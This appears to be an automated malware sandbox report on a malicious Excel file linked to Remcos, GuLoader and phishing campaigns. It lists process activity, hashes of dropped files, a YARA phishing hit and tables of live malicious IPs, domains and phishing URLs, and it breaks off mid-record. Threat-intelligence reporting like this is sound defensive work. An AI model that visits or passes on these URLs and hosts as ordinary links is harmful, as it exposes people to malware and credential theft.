Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• GSI enabled (VBA)
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: 0200011080.xls
Detection: MAL
Classification: mal100.rans.phis.troj.spyw.expl.evad.winXLS@37/39@13/5
EGA Information:
• Successful, ratio: 71.4%
HCA Information:
• Successful, ratio: 99%
• Number of executed functions: 199
                                                                                                                                                              • Number of non-executed functions: 321
                                                                                                                                                              Cookbook Comments:
                                                                                                                                                              • Found application associated with file extension: .xls
                                                                                                                                                              • Changed system and user locale, location and keyboard layout to French - France
                                                                                                                                                              • Found Word or Excel or PowerPoint or XPS Viewer
                                                                                                                                                              • Attach to Office via COM
                                                                                                                                                              • Active ActiveX Object
                                                                                                                                                              • Active ActiveX Object
                                                                                                                                                              • Scroll down
                                                                                                                                                              • Close Viewer
                                                                                                                                                              • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, conhost.exe
                                                                                                                                                              • Excluded IPs from analysis (whitelisted): 23.47.112.37, 104.17.202.1, 104.17.201.1
                                                                                                                                                              • Excluded domains from analysis (whitelisted): ion.cloudinary.com.edgekey.net, e1315.dsca.akamaiedge.net, resc.cloudinary.com.cdn.cloudflare.net
                                                                                                                                                              • Execution Graph export aborted for target mshta.exe, PID 3588 because there are no executed function
                                                                                                                                                              • Execution Graph export aborted for target mshta.exe, PID 4084 because there are no executed function
                                                                                                                                                              • Not all processes where analyzed, report is missing behavior information
                                                                                                                                                              • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                                                                              • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                                                                                                              • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                                                              • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                                                              • Report size getting too big, too many NtReadVirtualMemory calls found.
                                                                                                                                                              • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                                                                                              • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                                                                                              • VT rate limit hit for: 0200011080.xls
                                                                                                                                                              TimeTypeDescription
                                                                                                                                                              08:00:56API Interceptor138x Sleep call for process: mshta.exe modified
                                                                                                                                                              08:01:02API Interceptor241x Sleep call for process: powershell.exe modified
                                                                                                                                                              08:01:14API Interceptor36x Sleep call for process: wscript.exe modified
                                                                                                                                                              08:01:40API Interceptor917893x Sleep call for process: CasPol.exe modified
Match (IP) | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
31.13.224.72 | 17327986255b9be8bc9d871d6e246d7270b6644e5b5c3b696cfd132458bc59c32794b51c09844.dat-decoded.exe | Get hash | malicious | Remcos | Browse |
31.13.224.72 | Sipari#U015f_listesi.xls | Get hash | malicious | Remcos, HTMLPhisher | Browse |
31.13.224.72 | OC25-11-24.xls | Get hash | malicious | Remcos, HTMLPhisher | Browse |
178.237.33.50 | 1099833039444.pdf.js | Get hash | malicious | Remcos | Browse | geoplugin.net/json.gp
178.237.33.50 | RFQ-24-10104-PO X241104754-007.exe | Get hash | malicious | Remcos | Browse | geoplugin.net/json.gp
178.237.33.50 | FAT6789098700900.scr.exe | Get hash | malicious | Remcos | Browse | geoplugin.net/json.gp
178.237.33.50 | ISF (TWN24110458 - Invoice & Packing List PO POUS120000241, POUS120000771.scr.exe | Get hash | malicious | Remcos | Browse | geoplugin.net/json.gp
178.237.33.50 | 173317191746333e83fd715fcd29456f316941f504021238a7f0f8ba4a89827b03f83d6aba395.dat-decoded.exe | Get hash | malicious | Remcos | Browse | geoplugin.net/json.gp
178.237.33.50 | INTECH RFQ EN241813.exe | Get hash | malicious | Remcos | Browse | geoplugin.net/json.gp
178.237.33.50 | doc02122024782020031808174KR1802122024_po_doc_00000(991KB).vbs | Get hash | malicious | GuLoader, Remcos | Browse | geoplugin.net/json.gp
178.237.33.50 | Quote Qu11262024.scr.exe | Get hash | malicious | Remcos, GuLoader | Browse | geoplugin.net/json.gp
178.237.33.50 | RFQ_PX2_MULE2024_Travco_Engineering_Construction_PDF.exe | Get hash | malicious | Remcos | Browse | geoplugin.net/json.gp
178.237.33.50 | rAttached_updat.vbs | Get hash | malicious | GuLoader, Remcos | Browse | geoplugin.net/json.gp
151.101.65.137 | http://carajasnutricaoanimal.com | Get hash | malicious | Unknown | Browse |
151.101.65.137 | https://www.searchunify.com | Get hash | malicious | Unknown | Browse |
151.101.65.137 | https://www.searchunify.com | Get hash | malicious | Unknown | Browse |
151.101.65.137 | 024d88b8-442e-50b9-5c43-7c71d1433823.eml | Get hash | malicious | Unknown | Browse |
151.101.65.137 | https://www.searchunify.com | Get hash | malicious | Unknown | Browse |
151.101.65.137 | https://u32377541.ct.sendgrid.net/ls/click?upn=gbTUAIFdI3uVBaKVDIrm-2Fv1ZSHGPk6CrjUU8HwxRv3XogX5Mvrx9Tv11VuNRbuYsH1zE-2BIBtWDMzlXTEj-2B9-2BJTYJUT036UmzKCMNFUBTmVHWoZUf0I1RAxEy8rjXD3hieFWty-2FlRfiDpGIk0JqX9IB9V5jztpnU2UQb-2B16gY3H4Vf0wR0k6IoF0Sd5AebKUD4d2WkW0zPMzEZHgQk4PilA-3D-3DuEN5_joQjRSvNxC1G7o6EQLc2eubh6d5j8MX480B8rjwEUVwIWLFJiTnn42uP24WiJdkk1wENxr6Z-2BcAnb-2BzO-2BoPsei4n3KKCnOb9-2F-2BSfzt2WRD4NciHjr9qdj4nKQIhwvjiTm1Jue7LvqYkwbzFVzOATkYWOMZmWh-2BNVftF4HxLBJoXbBuOBUAUmn6Bqy1FylGA9WHXOBxBzzpW5ZaKjOzL87uR02AFin4npksOlwKwsoHq8EQaijmSkucUIL66YcB9E9ngCKs2TqyrD6EC45xUnNc-2B8tztAXLdahj5Hwv2yUqjDKwEnSxAQq-2BkVZxzYDr-2BlH1XzRdCmvlVYLxz5Egu5y-2F16Pmnn22vIEe2gWufenNNxM3SXN0b06i9EX9e-2BxsnRYNg9SylsaxdVU0OWpsqBQGRGYCmzw3CE2B7O5a39Hk0AMDkGwpnrIIt-2F9uOR6hua6zuv9fcoQQry3m8BO-2FRBwC3Oa02ZrduYodn1TfpSII4CIlpzrpXvNsmwcMyNz4Vf4pGTr-2Bte4cyNZVxQ1bhSeOnWSFOpetOEG2MEc-2B519M27Y-2FmNr8hKutIP6TDnL9nk9lZeosJs4LxqLO7TB-2FeksEtqgoSjKUJHg3wVZKXNzM4xnYfmVzk2Aw5mxHjIC-2BkwLXnfP09KqjfTHuA2wwPnHBfEMZ9b6VF1dOdpxmFHWIdsPCsYDTo9nUvjnYCusyM1AkuYnqg6Yz5htZbWe-2Fky7wr1LY-2FW22aKZnRD8zoMSjnuZ8Zfq0rrC4BwNHpRUuVs8JU19-2FUDbIcijHTDd26VewLCqZhSLdLQfS5McOZY5bpkvICuCE4mVuUsxCu9wNzgqVAescw46u1sfcZ-2B0HVNk4LyFuw9f3LCooMwUgcuqPE-3D | Get hash | malicious | HTMLPhisher | Browse |
151.101.65.137 | http://bookmarkinghost.info | Get hash | malicious | Unknown | Browse |
Match (domain) | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
cloudinary.map.fastly.net | 1013911.js | Get hash | malicious | FormBook | Browse | 151.101.1.137
cloudinary.map.fastly.net | http://christians-google-sh-97m2.glide.page/dl/d0a5f4 | Get hash | malicious | Unknown | Browse | 151.101.129.137
cloudinary.map.fastly.net | Steelcase Series 1 Sustainable Office Chair _ Steelcase.html | Get hash | malicious | Unknown | Browse | 151.101.129.137
cloudinary.map.fastly.net | https://jenifer-lopezz.pages.dev/ | Get hash | malicious | Unknown | Browse | 151.101.129.137
cloudinary.map.fastly.net | https://bookme.name/simonmed/us | Get hash | malicious | HtmlDropper, HTMLPhisher | Browse | 151.101.129.137
cloudinary.map.fastly.net | http://carajasnutricaoanimal.com | Get hash | malicious | Unknown | Browse | 151.101.65.137
cloudinary.map.fastly.net | http://itsecurityupdate.com | Get hash | malicious | Unknown | Browse | 151.101.1.137
cloudinary.map.fastly.net | https://link.mail.beehiiv.com/ss/c/SFMS2DGC_3bR2eTtelyfFUzhcGs9TWsEeQw8nQp279J9B9upNohe5IND2DzRg4GfFe3uzMCkwl0VCcFF4p9tdZ71PSC4SlxBXIoR6qgai_e9KXQu46yVwLcidRn-ax90dry5wHpUbN5t2kTBuqVHtjiUR148OM6f2kzv0FbM9-j2d8Pfv1aAiA8m-jIRZ1qPGcwv7cKHtg7zS7k4vguTCgqcLvbDJq61ZPMm3FUyJbd-2ROdV-1aYJVxlO48nGuxkYE6PJ8AjBLfTrwxiX4S2X3JBdpAgH-S1qPrWFIUFnwhW_rcr9w0IZhVJg2k6UwPe0XxcmVm_hXa3Zy0nKOCBvO11zW3IuzS0wT0aqoeUGhUZL_BJAovHWU-78ta_hn0kcmqrlBzh66Yb9lBLgDUfmEypG1yBWRlXPRZ1w7redaJaooKiPuwr2V5n8bXDS9_yWg2USHIOqCrcsTtBGYogmSv3HnV9rD8TCUiXo47xhMBVMzr7StZWjjgT4kZsxK7CX-zIn8YCCC8lkjyOEp6xgdXFjETIB4df5tQm7lBbPlCZ99btsVwezxOnJZ4MV1piJOH9CONfmhGD5405v_OGQ0ddDY5d31qqadrUj9T5uo/422/2hUrqrZHQZSMSqb_7MA2RQ/h1/bXAkiKjrMazQzzpENtDvosiaH2ZRcmZd0aMxcbDunvM | Get hash | malicious | Unknown | Browse | 151.101.193.137
cloudinary.map.fastly.net | https://www.payment.token2049.com/page/3156941?widget=true& | Get hash | malicious | Unknown | Browse | 151.101.1.137
cloudinary.map.fastly.net | https://pitch.com/public/655a5c71-d891-49c9-aedc-7c00de75174d | Get hash | malicious | Unknown | Browse | 151.101.1.137
geoplugin.net | 1099833039444.pdf.js | Get hash | malicious | Remcos | Browse | 178.237.33.50
geoplugin.net | RFQ-24-10104-PO X241104754-007.exe | Get hash | malicious | Remcos | Browse | 178.237.33.50
geoplugin.net | FAT6789098700900.scr.exe | Get hash | malicious | Remcos | Browse | 178.237.33.50
geoplugin.net | ISF (TWN24110458 - Invoice & Packing List PO POUS120000241, POUS120000771.scr.exe | Get hash | malicious | Remcos | Browse | 178.237.33.50
geoplugin.net | 173317191746333e83fd715fcd29456f316941f504021238a7f0f8ba4a89827b03f83d6aba395.dat-decoded.exe | Get hash | malicious | Remcos | Browse | 178.237.33.50
geoplugin.net | INTECH RFQ EN241813.exe | Get hash | malicious | Remcos | Browse | 178.237.33.50
geoplugin.net | doc02122024782020031808174KR1802122024_po_doc_00000(991KB).vbs | Get hash | malicious | GuLoader, Remcos | Browse | 178.237.33.50
geoplugin.net | Quote Qu11262024.scr.exe | Get hash | malicious | Remcos, GuLoader | Browse | 178.237.33.50
geoplugin.net | RFQ_PX2_MULE2024_Travco_Engineering_Construction_PDF.exe | Get hash | malicious | Remcos | Browse | 178.237.33.50
geoplugin.net | rAttached_updat.vbs | Get hash | malicious | GuLoader, Remcos | Browse | 178.237.33.50
Match (ASN) | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
FASTLYUS | file.exe | Get hash | malicious | Credential Flusher | Browse | 151.101.129.91
FASTLYUS | phish_alert_sp2_2.0.0.0 (8).eml | Get hash | malicious | Unknown | Browse | 199.232.210.172
FASTLYUS | file.exe | Get hash | malicious | Credential Flusher | Browse | 151.101.129.91
FASTLYUS | https://searchandprint.recipes | Get hash | malicious | Unknown | Browse | 151.101.2.137
FASTLYUS | file.exe | Get hash | malicious | Credential Flusher | Browse | 151.101.129.91
FASTLYUS | file.exe | Get hash | malicious | Credential Flusher | Browse | 151.101.65.91
FASTLYUS | file.exe | Get hash | malicious | Credential Flusher | Browse | 151.101.193.91
FASTLYUS | file.exe | Get hash | malicious | Credential Flusher | Browse | 151.101.193.91
FASTLYUS | I_ katya_gianotti@cuzziol_it password scadr#U00e0 oggi!.msg | Get hash | malicious | Unknown | Browse | 199.232.214.172
FASTLYUS | file.exe | Get hash | malicious | Unknown | Browse | 151.101.1.91
SARNICA-ASBG | 17327986255b9be8bc9d871d6e246d7270b6644e5b5c3b696cfd132458bc59c32794b51c09844.dat-decoded.exe | Get hash | malicious | Remcos | Browse | 31.13.224.72
SARNICA-ASBG | Sipari#U015f_listesi.xls | Get hash | malicious | Remcos, HTMLPhisher | Browse | 31.13.224.72
SARNICA-ASBG | Evjm8L1nEb.exe | Get hash | malicious | Unknown | Browse | 31.13.224.69
SARNICA-ASBG | ugisGK1R1q.exe | Get hash | malicious | DarkVision Rat | Browse | 31.13.224.69
SARNICA-ASBG | Evjm8L1nEb.exe | Get hash | malicious | Unknown | Browse | 31.13.224.69
SARNICA-ASBG | OC25-11-24.xls | Get hash | malicious | Remcos, HTMLPhisher | Browse | 31.13.224.72
SARNICA-ASBG | n5QCsKJ0CP.exe | Get hash | malicious | RedLine | Browse | 31.13.224.34
                                                                                                                                                                                  ahmbf.ps1Get hashmaliciousUnknownBrowse
                                                                                                                                                                                  • 31.13.224.69
                                                                                                                                                                                  Order88983273293729387293828PDF.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                                                                                  • 93.123.109.168
                                                                                                                                                                                  Order88983273293729387293828PDF.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                                                                                  • 93.123.109.168
                                                                                                                                                                                  ATOM86-ASATOM86NL1099833039444.pdf.jsGet hashmaliciousRemcosBrowse
                                                                                                                                                                                  • 178.237.33.50
                                                                                                                                                                                  RFQ-24-10104-PO X241104754-007.exeGet hashmaliciousRemcosBrowse
                                                                                                                                                                                  • 178.237.33.50
                                                                                                                                                                                  FAT6789098700900.scr.exeGet hashmaliciousRemcosBrowse
                                                                                                                                                                                  • 178.237.33.50
                                                                                                                                                                                  ISF (TWN24110458 - Invoice & Packing List PO POUS120000241, POUS120000771.scr.exeGet hashmaliciousRemcosBrowse
                                                                                                                                                                                  • 178.237.33.50
                                                                                                                                                                                  173317191746333e83fd715fcd29456f316941f504021238a7f0f8ba4a89827b03f83d6aba395.dat-decoded.exeGet hashmaliciousRemcosBrowse
                                                                                                                                                                                  • 178.237.33.50
                                                                                                                                                                                  INTECH RFQ EN241813.exeGet hashmaliciousRemcosBrowse
                                                                                                                                                                                  • 178.237.33.50
                                                                                                                                                                                  doc02122024782020031808174KR1802122024_po_doc_00000(991KB).vbsGet hashmaliciousGuLoader, RemcosBrowse
                                                                                                                                                                                  • 178.237.33.50
                                                                                                                                                                                  Quote Qu11262024.scr.exeGet hashmaliciousRemcos, GuLoaderBrowse
                                                                                                                                                                                  • 178.237.33.50
                                                                                                                                                                                  RFQ_PX2_MULE2024_Travco_Engineering_Construction_PDF.exeGet hashmaliciousRemcosBrowse
                                                                                                                                                                                  • 178.237.33.50
                                                                                                                                                                                  rAttached_updat.vbsGet hashmaliciousGuLoader, RemcosBrowse
                                                                                                                                                                                  • 178.237.33.50
                                                                                                                                                                                  DIGITALOCEAN-ASNUSSFaLIQYuEV.htmGet hashmaliciousWinSearchAbuseBrowse
                                                                                                                                                                                  • 68.183.112.81
                                                                                                                                                                                  8xOax9866X.htmGet hashmaliciousWinSearchAbuseBrowse
                                                                                                                                                                                  • 68.183.112.81
                                                                                                                                                                                  uioLmjrj4F.htmGet hashmaliciousWinSearchAbuseBrowse
                                                                                                                                                                                  • 68.183.112.81
                                                                                                                                                                                  https://es.vecteezy.com/arte-vectorial/20279878-kyd-letra-logo-diseno-en-blanco-antecedentes-kyd-creativo-circulo-letra-logo-concepto-kyd-letra-disenoGet hashmaliciousUnknownBrowse
                                                                                                                                                                                  • 161.35.119.123
                                                                                                                                                                                  https://secure_sharing0utlook.wesendit.com/dl/ON6fQWpNLtFc53e1u/bWlrZS5zbGVpZ2h0QGtlbXRpbGUuY28udWsGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                  • 67.207.79.245
                                                                                                                                                                                  https://atpscan.global.hornetsecurity.com/?d=m-jrZYNTvS7OucEG6zgopo_P-eFuotBy6khKzMMoLZ4&f=B3z_aD7k-FJHzGTgRypMC4okZ3IwSory4vTIxE3HdJ_vtmaZKtKUThjBimGO9ug0&i=&k=4AW8&m=GVQPkt_RSTiDpwD3aZUptFFr0zCshjoFLqhJ3NjtibWBkTpV22jDRnOpUHUftsT9uvGtNvEk65KPlyjsi0fzlHEgnGzER6prH6oEwQ6iGZMuyrzkW43X0VpXiLTd8OwU&n=LPqMxEbLmB_Zh1f7NoMu0JEABS3tNgPjYsrca87TqctDejHSuebypqLStQvhBN5eG43hQ2ReWbrTClyFyYZQHA&r=-0Amt46rVl0s1yn8_P2jWFIQhQ5qvzjVNyyZ7Ng6X4pWNR2O0BffN49tqRoSmkJg&s=ef9a322854c7503d3037fcbcda0a6c433cee94d107fe0a8ab1fda12b2f14509b&u=https%3A%2F%2Fsecure_sharing0utlook.wesendit.com%2Fdl%2FON6fQWpNLtFc53e1u%2FbWlrZS5zbGVpZ2h0QGtlbXRpbGUuY28udWsGet hashmaliciousUnknownBrowse
                                                                                                                                                                                  • 67.207.79.245
                                                                                                                                                                                  https://www.therooms.ca/sites/default/files/images/virtual-exhibits/rnr/3dobject_example.zipGet hashmaliciousUnknownBrowse
                                                                                                                                                                                  • 157.230.71.133
                                                                                                                                                                                  https://bielefelde.de/Get hashmaliciousUnknownBrowse
                                                                                                                                                                                  • 206.189.225.178
                                                                                                                                                                                  botnet.x86.elfGet hashmaliciousMirai, MoobotBrowse
                                                                                                                                                                                  • 134.123.187.11
                                                                                                                                                                                  mips.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                                                                                                                                                                  • 45.55.15.182
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
No context
Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type: data
Category: dropped
Size (bytes): 15189
Entropy (8bit): 5.0343247648743
Encrypted: false
SSDEEP: 384:nWraVoGIpN6KQkj2Lkjh4iUxTnaVjvCnS/OdBmRWDf:nW+V3IpNBQkj2Oh4iUxDaVjvCnS/OdBD
MD5: 7BC3FB6565E144A52C5F44408D5D80DF
SHA1: C3C443BF9F29EAA84B0A580FD5469F4C5CC57F77
SHA-256: EF6A75C051D70322EDCD5A89E6398CC00E3D860E87A0C7981310D30837CBA495
SHA-512: D0A936BAF2277884518EDF4729F88DA74C7BAA5BBB58C1060CE66DE92A23694EA993CA69D8820816C5D28182E9A38EE59DE821EE3A73F0D85DBBC74D406285A5
Malicious: false
                                                                                                                                                                                  Preview:PSMODULECACHE.....8.......S...C:\Program Files\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script..........V.7...?...C:\Windows\system32\WindowsPowerShell\v1.0\Modules\ISE\ISE.psd1........Import-IseSnippet........Get-IseSnippet........New-IseSnippet.........._.7...[...C:\Windows\system32\WindowsPowerShell\v1.0\Modules\PSWorkflowUtility\
Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type: data
Category: dropped
Size (bytes): 64
Entropy (8bit): 0.34726597513537405
Encrypted: false
SSDEEP: 3:Nlll:Nll
MD5: 446DD1CF97EABA21CF14D03AEBC79F27
SHA1: 36E4CC7367E0C7B40F4A8ACE272941EA46373799
SHA-256: A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
SHA-512: A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
Malicious: false
                                                                                                                                                                                  Preview:@...e...........................................................
Process: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type: HTML document, ASCII text, with very long lines (65536), with no line terminators
Category: modified
Size (bytes): 159730
Entropy (8bit): 2.151955061259752
Encrypted: false
SSDEEP: 96:4owZw9d6yfaRlC/5u5oB3WnKqjIlgREe/b2F53QStlC/5u5oB3WnKqjIAgREe/bQ:4Lwsoqvgc12OYUQ
MD5: B57E8C4722889166196BD6CA92C4383A
SHA1: 5628162AB713E034F10FCE235B08C0FF8E4131D5
SHA-256: 5147E58C7D2D5D0296C74619C246F81569DAB8C9271513B19B3D1BD4C406C702
SHA-512: 2887FAD423BD58E20EDEE6D0809FCFBF2A768D14F463DA8DDF69E0EB823E3F42304EB41FC38111124C60B3D4E9385054F0CF7D84512E6B5128CF8E43BA70847D
Malicious: true
Yara Hits:
• Rule: JoeSecurity_HtmlPhish_44, Description: Yara detected HtmlPhish_44, Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\niceworkingpersonwithhergirlfriendsheisbeautiful[1].hta, Author: Joe Security

Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:Unicode text, UTF-16, little-endian text, with very long lines (3200), with CRLF line terminators
Category:dropped
Size (bytes):153968
Entropy (8bit):3.790314730405568
Encrypted:false
SSDEEP:3072:tx65fliEYTNokaahkpx65fliEYTNokaahvpx65fliEYTNokaah+:tAHGNAiCAHGNAiRAHGNAi+
MD5:23F2631CE99480A209B12A8F520D5480
SHA1:1F6CB113C9A2FF37CE5047B25EE7F432A4DBC950
SHA-256:4F1B501AD9C6CFEDAC6521C680F30D4FDBFDBD86C2742755D07F67C4939F0235
SHA-512:D906B932E7D6C8BD87D47E7D52E2CAF0AE05231E02BA720D8F81D9A90F5A2688773EC80CA91775B8753812FD638D2D123564489DA066A4C423DD76EB7F5CCAAE
Malicious:false

Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
File Type:JSON data
Category:dropped
Size (bytes):963
Entropy (8bit):5.014904284428935
Encrypted:false
SSDEEP:12:tkluJnd6CsGkMyGWKyGXPVGArwY307f7aZHI7GZArpv/mOAaNO+ao9W7iN5zzkwV:qluNdRNuKyGX85jvXhNlT3/7AcV9Wro
MD5:B66CFB6461E507BB577CDE91F270844E
SHA1:6D952DE48032731679F8718D1F1C3F08202507C3
SHA-256:E231BBC873E9B30CCA58297CAA3E8945A4FC61556F378F2C5013B0DDCB7035BE
SHA-512:B5C1C188F10C9134EF38D0C5296E7AE95A7A486F858BE977F9A36D63CBE5790592881F3B8D12FEBBF1E555D0A9868632D9E590777E2D3143E74FD3A44C55575F
Malicious:false
Preview:{. "geoplugin_request":"8.46.123.228",. "geoplugin_status":200,. "geoplugin_delay":"1ms",. "geoplugin_credit":"Some of the returned data includes GeoLite2 data created by MaxMind, available from <a href='https:\/\/www.maxmind.com'>https:\/\/www.maxmind.com<\/a>.",. "geoplugin_city":"New York",. "geoplugin_region":"New York",. "geoplugin_regionCode":"NY",. "geoplugin_regionName":"New York",. "geoplugin_areaCode":"",. "geoplugin_dmaCode":"501",. "geoplugin_countryCode":"US",. "geoplugin_countryName":"United States",. "geoplugin_inEU":0,. "geoplugin_euVATrate":false,. "geoplugin_continentCode":"NA",. "geoplugin_continentName":"North America",. "geoplugin_latitude":"40.7123",. "geoplugin_longitude":"-74.0068",. "geoplugin_locationAccuracyRadius":"20",. "geoplugin_timezone":"America\/New_York",. "geoplugin_currencyCode":"USD",. "geoplugin_currencySymbol":"$",. "geoplugin_currencySymbol_UTF8":"$",. "geoplugin_currencyConverter":0.}

Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
Category:dropped
Size (bytes):1293620
Entropy (8bit):4.563127917199792
Encrypted:false
SSDEEP:6144:HepUelSAzNeNpVAZSedri2/Op4mD3f5ReZdZJElOFmkDrvwA2w4Meh/q4MmuRDrM:HepRlSPiS4ri2/lmzCJEuL1eU1muq
MD5:F71C973B5E362DFD6408D6C009E5643E
SHA1:24B3CE67B31BFD4791287932206D54C73489424E
SHA-256:27D0986B7EC233689490135118670F01325F21DFD6F60492AF5D62C7CF1E3045
SHA-512:4C3F506BC4313437C9194EED3CD5AB6616490AE376FC61DD38D8E00F975C41A23FC8D322E41CFBEC380F04F49ADF6E77A3B22BB5C96EBE714F5713B09838F1F4
Malicious:false

Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
Category:dropped
Size (bytes):109544
Entropy (8bit):4.282675970330063
Encrypted:false
SSDEEP:768:I4KlWqWxZiDQ4hHdCUeHxCDJB9Cnh3KCg0F9BV:I42WxF4MyeKCV
MD5:F7B9A8F20E64B2CB6B572BCBA5866236
SHA1:2F092A0A518639332BE76BF60DBB966AC331D356
SHA-256:72447B22A4BBC05B9E9183DF2ADB712AB51C3A45C6247C2303024197D1623F57
SHA-512:4A78624A9EB02208F3F30D03CC53EBE00BDD2C59E8F7719E35E706D51CD2F8D0D330BE6D6FAD2A9652536F888CB99E0CBE1E3B97A05EA65CB5914C37C501B728
Malicious:false

Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
Category:dropped
Size (bytes):1293620
Entropy (8bit):4.563127917199792
Encrypted:false
SSDEEP:6144:HepUelSAzNeNpVAZSedri2/Op4mD3f5ReZdZJElOFmkDrvwA2w4Meh/q4MmuRDrM:HepRlSPiS4ri2/lmzCJEuL1eU1muq
MD5:F71C973B5E362DFD6408D6C009E5643E
SHA1:24B3CE67B31BFD4791287932206D54C73489424E
SHA-256:27D0986B7EC233689490135118670F01325F21DFD6F60492AF5D62C7CF1E3045
SHA-512:4C3F506BC4313437C9194EED3CD5AB6616490AE376FC61DD38D8E00F975C41A23FC8D322E41CFBEC380F04F49ADF6E77A3B22BB5C96EBE714F5713B09838F1F4
Malicious:false

Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
Category:dropped
Size (bytes):44256
Entropy (8bit):3.147465798679962
Encrypted:false
SSDEEP:384:j1W5NF0vUXfOjwTsiyGGiugBhUErpxTORe4tyJ2c:ZWYW+GGidBhUErpxTORe4ty5
MD5:36D8FF25D14E7E2FBB1968E952FF9C17
SHA1:E3BD7140DA6CAD87C5A1D5417DFBDD7B0E67B110
SHA-256:305DCBFBEB9FFEE587E061D779CA1DDF31939ECD64EEE7D8A22BA9D640B48633
SHA-512:B4B753222F617F78B36949BD9F37E13D68D9FD7367484BEE799F0D7AE38E1705E997A6409251BC2B9830012536FBD08C3C6CB7411D9122F939833F38E303DCBF
Malicious:false

Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
Category:dropped
Size (bytes):44256
Entropy (8bit):3.15066292565687
Encrypted:false
SSDEEP:384:IhpMW5NFNimpUIuOjwTsiyGGiugBhUErpxTORe4tyIWY5:BWzi+8+GGidBhUErpxTORe4tyI9
MD5:F1EC2E98B0F577B675156B13DCF94105
SHA1:4FF2D02051E92771FBB245BA8095C80148A0F61A
SHA-256:66AFB9C12E20A08F9A713C366EDE8A9CD8F4A93B7D7BFC76205013C28A3250E9
SHA-512:6E442DB49BF2A429AD2CA7CB3804D79791C1E1FEB414F69FDDD58042E98C5AA5BFC1C751713DB76DD58DC9F3CAC3A7C491228797A909F8FD0291048E8F2FC9BE
Malicious:false

Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:very short file (no magic)
Category:dropped
Size (bytes):1
Entropy (8bit):0.0
Encrypted:false
SSDEEP:3:U:U
MD5:C4CA4238A0B923820DCC509A6F75849B
SHA1:356A192B7913B04C54574D18C28D46E6395428AB
SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
Malicious:false
Preview:1

Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:very short file (no magic)
Category:dropped
Size (bytes):1
Entropy (8bit):0.0
Encrypted:false
SSDEEP:3:U:U
MD5:C4CA4238A0B923820DCC509A6F75849B
SHA1:356A192B7913B04C54574D18C28D46E6395428AB
SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
Malicious:false
Preview:1
                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                  File Type:very short file (no magic)
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):1
                                                                                                                                                                                  Entropy (8bit):0.0
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:3:U:U
                                                                                                                                                                                  MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                                                                                                  SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                                                                                                  SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
